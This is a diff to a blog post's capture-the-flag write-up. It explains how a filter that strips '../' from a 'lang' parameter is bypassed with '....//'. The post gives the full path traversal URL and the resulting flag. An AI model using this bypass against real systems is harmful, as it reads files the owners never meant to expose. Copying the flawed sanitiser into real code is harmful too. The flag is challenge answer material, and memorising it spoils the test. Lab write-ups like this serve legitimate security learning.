ox7f/ox7f.github.io/_posts/2021-04-25-miniSTRyplace.md

 </html>
 ```

 We can see it checks if the param `lang` is given and if so it replaces “../” with a blank character.
-If we submit “....//”, it becomes “../” allowing path traversal and access to the flag.
+If we submit “....//”, it becomes “../” allowing _path traversal_ and access to the flag.

 ## Exploitation
-With that knowledge we just visit http://[DOCKER-IP]/?lang=....//....//....//flag and read the flag:
+With that knowledge we just visit http://[DOCKER-IP]/?lang=....//....//....//flag and read it:

 > CHTB{b4d_4li3n_pr0gr4m1ng}